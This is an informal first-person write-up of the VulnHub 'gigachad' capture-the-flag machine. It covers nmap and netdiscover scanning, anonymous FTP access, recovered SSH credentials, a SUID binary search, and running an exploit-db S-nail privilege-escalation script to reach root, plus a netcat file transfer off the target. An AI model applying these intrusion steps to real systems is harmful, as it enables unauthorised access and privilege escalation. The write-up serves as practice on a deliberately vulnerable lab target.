CTF-gigachad
Discovery
link: vulnhub-GAGACHAD
The only information we have itโs there is multiple flags.
Discovery and Scanning
netdiscover
Fast scan with netdiscover.
sudo netdiscover -r 192.168.0.0/16_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
----------------------------------------------------------------------------
192.168.0.19 08:00:27:d0:52:bc 1 42 PCS Systemtechnik GmbHnmap
sudo nmap -sV -p- 192.168.0.19Nmap scan report for 192.168.0.19
Host is up (0.00010s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
MAC Address: 08:00:27:D0:52:BC (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelWe have the port 21, 22 and 80 open and it's a debian machine.
port 80
Let's to to http://192.168.0.19 and see what I can find.
With the inspector(F12) I found a key:A7F9B77C16A3AA80DAA4E378659226F628326A95 D82D10564866FD9B201941BCC6C94022196F8EE8
Dirbuster
I run a dirbuster with a common wordlist.dirbuster -u http://192.168.0.19/ -l Wordlist-common.txt
Ohโฆ I found 500 directories, I stop the scan, it's useless
Hash
Is an SHA-1 hash:
a7f9b77c16a3aa80daa4e378659226f628326a95 = fuck you
D82D10564866FD9B201941BCC6C94022196F8EE8 = VIRGIN
Maybe itโs a password or a user.
I got all what I need so I can go to the FTP part.
port 21
ftp 192.168.0.19
bash: ftp : commande introuvable
oh, I use arch BTW (and I'm french)sudo pacman -S inetutils
Now we can play.ftp 192.168.0.19
user: anonymous
password: password
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>I'm in, letโs see what we can have with ls.
-r-xr-xr-x 1 1000 1000 297 Feb 07 17:33 chadinfoGood, I have to read it.
Download: ftp>get chadinfo
Read: cat chadinfo
PK
0
HR๏ฟฝ๏ฟฝ๏ฟฝฦchadinfoUT ๏ฟฝj `Zj `ux
why yes,
#######################
username is chad
???????????????????????
password?
!!!!!!!!!!!!!!!!!!!!!!!
go to /drippinchad.png
PK
0
HR๏ฟฝ๏ฟฝ๏ฟฝฦ๏ฟฝ๏ฟฝchadinfoUT๏ฟฝj `ux
PKN๏ฟฝUser: chad
Password: in the image drippinchad.png
http://192.168.0.19/drippinchad.png
I will use google image to see where is it.
It's maiden's tower it should be the password.
After multiples attempts the password is maidenstower
I'm connected as chad:
we have the directory ftp with the chadinfo,
and also user.txt.
I download and read it.
flag 1/2
โโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโ
Nice, I think I'm done with the ftp, I go to sleep I will continue tomorrow.
Port 22
I'm back.
I will try to connect to ssh with previous creds:
User: chad
Password: maidenstower
ssh chad@192.168.0.19I'm in!
I am in his home directory, I will display whatโs in:
ls -la
drwxr-xr-x 4 chad chad 4096 Jul 16 06:51 .
drwxr-xr-x 3 root root 4096 Feb 7 14:57 ..
dr-xr-xr-x 2 chad chad 4096 Feb 7 16:41 ftp
drwx------ 3 chad chad 4096 Jul 16 06:51 .gnupg
-r-x------ 1 chad chad 1805 Jan 3 2021 user.txt.gnupg seem intresting
I have the directory private-keys-v1.d, but itโs empty.
Vulnerability Assessment
Find perms
Hausec pentest-cheatsheep
Find Binaries that will execute as the owner:find / -perm -u=s -type f 2>/dev/null
This is what I found:
/usr/lib/openssh/ssh-keysign
/usr/lib/s-nail/s-nail-privsep
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chshs-nail look instresting:s-nail -V v14.8.6
Exploit
I found this on exploit database:
S-nail < 14.8.16 - Local Privilege Escalation
14.8.6 = 14.8.60 or 14.8.06 ?
Letโs try it.
touch exploit.shvi exploit.sh
Past this: https://www.exploit-db.com/raw/47172
Escape, :wq.chmod + x exploit.sh./exploit.sh
Result:
[-] Failed. Not vulnerable?
[.] Cleaning up...
[-] FailedThis is the only exploit on exploit database, what I did wrong?
I'm trying to download the file in the chad machine but the terminal is so buggy.
I will use scp to give him the file.scp 47172.sh chad@192.168.0.19:/tmp/exploit.sh
Type the password: maidenstower
I have to run is with bash because ./ don't work, and I have too much errors now.
I think the machine is broken or maybe my shell,
I have some errors and it's my first CTF with this machine.
I fixed it with this here.
So let's run the script and fail again, so I spamed it and I'm in!
I will change my shell
/bin/bash.I'm roo so letโs see what is in
/root/ directory.
# cat root.txt
flag 2/2
โโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโ
congratulations!Nice, the CTF is over, it was easy.
There is an image, I will download it:
Receiver machine: nc -l -p 1234 > chad.png
Sender machine: nc -w 192.168.0.16 < chad.png
This is the end, I hope you liked it, it was my first writeup.
